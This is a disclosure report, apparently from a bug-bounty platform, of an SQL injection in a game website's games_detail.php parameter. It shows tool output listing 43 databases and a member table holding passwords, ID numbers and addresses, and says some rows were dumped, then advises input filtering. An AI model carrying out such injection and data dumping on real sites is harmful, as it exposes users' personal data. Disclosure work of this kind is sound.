2015-12-30: Details reported to the vendor; awaiting vendor response
2015-12-31: Vendor confirmed; details disclosed to the vendor only
2016-01-10: Details disclosed to core white hats and relevant domain experts
2016-01-20: Details disclosed to regular white hats
2016-01-30: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public
As the title says.
Site: http://**.**.**.**/
Injection link:
http://**.**.**.**/games_detail.php?cid=68
Database information:
current user: 'root@localhost'
[10:42:49] [INFO] fetching current d
current database: 'biz-game'
[10:42:50] [INFO] testing if current
[10:42:50] [INFO] fetching current u
current user is DBA: True
[10:42:50] [INFO] fetching database
available databases [43]:
[*] beergame
[*] beergame_it.lhu
[*] bg_mobile_0711
[*] bg_mobile_0721
[*] bg_mobile_0731
[*] bgm
[*] bgm_0826
[*] biz
[*] biz-game
[*] bizarena
[*] boss_register
[*] coo_admin
[*] coo_admin_it.lhu
[*] csm_register
[*] cyl
[*] cyl_alpha
[*] cyl_gb
[*] drupal_739
[*] edm
[*] edutec_register
[*] gwtb
[*] happy_farm
[*] information_schema
[*] limesv_cn
[*] limesv_tw_just_stand_by
[*] menu
[*] mw_register
[*] mysql
[*] re
[*] re_admin
[*] re_admin_it.lhu
[*] reissue_license
[*] restaurateur
[*] restaurateur_patch
[*] restaurateur_phpbb3
[*] sa
[*] sa147
[*] sa_0804
[*] sa_biz_register
[*] saranking
[*] user_trial
[*] vip
[*] vip_mobile
Columns of the member table:
Database: biz-game
Table: member
[70 columns]
+-------------------------------------+--------------+
| Column                              | Type         |
+-------------------------------------+--------------+
| aps                                 | int(11)      |
| arena_b                             | int(11)      |
| beergame                            | int(11)      |
| boss                                | int(11)      |
| bounce_times                        | int(11)      |
| c_aps                               | char(1)      |
| c_arena_b                           | char(1)      |
| c_beergame                          | char(1)      |
| c_boss                              | char(1)      |
| c_coo                               | char(1)      |
| c_csm                               | char(1)      |
| c_cyl                               | char(1)      |
| c_ipo                               | char(1)      |
| c_magnus                            | char(1)      |
| c_mw                                | char(1)      |
| c_re                                | char(1)      |
| c_sa                                | char(1)      |
| c_vrd                               | char(1)      |
| check_code                          | varchar(32)  |
| cid                                 | varchar(10)  |
| cid_validated                       | char(1)      |
| cname                               | varchar(16)  |
| coo                                 | int(11)      |
| country_code                        | varchar(3)   |
| csm                                 | int(11)      |
| cyl                                 | int(11)      |
| dept                                | varchar(16)  |
| email                               | varchar(64)  |
| email2                              | varchar(64)  |
| email2_validated                    | char(1)      |
| email3                              | varchar(64)  |
| email3_validated                    | char(1)      |
| email_validated                     | char(1)      |
| expert                              | varchar(128) |
| facebook_id                         | bigint(20)   |
| home_address                        | varchar(128) |
| home_tel                            | varchar(64)  |
| id                                  | int(11)      |
| import_datetime                     | datetime     |
| ipo                                 | int(11)      |
| is_admin                            | char(1)      |
| is_host                             | char(1)      |
| last_datetime_to_click_email        | datetime     |
| last_datetime_to_read_email         | datetime     |
| magnus                              | int(11)      |
| mobile                              | varchar(64)  |
| mobile_validated                    | char(1)      |
| mobile_validation_code              | int(11)      |
| mobile_validation_remain_sms_times  | int(11)      |
| mw                                  | int(11)      |
| nickname                            | varchar(16)  |
| office_address                      | varchar(128) |
| office_fax                          | varchar(32)  |
| office_tel                          | varchar(64)  |
| org                                 | varchar(64)  |
| password                            | varchar(32)  |
| ranking                             | int(11)      |
| rcrd                                | text         |
| re                                  | int(11)      |
| remark                              | text         |
| sa                                  | int(11)      |
| score                               | int(11)      |
| status                              | int(11)      |
| temp_plain_password_should_be_clean | varchar(16)  |
| title                               | varchar(32)  |
| total_times_to_click_email          | int(11)      |
| total_times_to_read_email           | int(11)      |
| type1                               | int(11)      |
| validated_mobile_backup             | varchar(64)  |
| vrd                                 | int(11)      |
+-------------------------------------+--------------+
A few rows were dumped for demonstration.
To summarize:
Player name # player email # national ID number # mobile number # address # school and major # username # password, etc.; cross-database access is also possible...
Demonstrated above.
Filter the input.
Severity: High
Vulnerability Rank: 17
Confirmed: 2015-12-31 02:23
Thanks for the report.
None yet.